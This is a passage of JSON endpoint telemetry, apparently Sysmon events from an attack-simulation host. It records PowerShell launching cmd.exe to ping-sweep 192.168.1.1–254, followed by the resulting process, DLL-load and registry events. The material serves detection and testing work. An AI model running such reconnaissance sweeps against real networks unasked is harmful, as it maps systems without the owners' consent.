"pid": 3276, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883572002300000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7328, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883572002880000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883572002770000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.1", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6948, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572003000000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - 
"user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - 
"pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572002920000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": 
"{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003080000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003240000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003240000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "process", - "pid": 6948, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572003550000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" - }, - { - "event_type": "file", - "file_name": "PING.EXE-B29F6629.pf", - "file_path": "C:\\Windows\\Prefetch\\PING.EXE-B29F6629.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883572003550000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.2", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3500, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572003750000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}", - 
"unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": 
"{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003700016, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572003860000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "event_type": "process", - "pid": 3500, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.3", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1480, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572004310000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004170000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, 
- { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004330000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "event_type": "process", - "pid": 1480, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572004640000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.4", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 996, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572004870000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572004800000, - 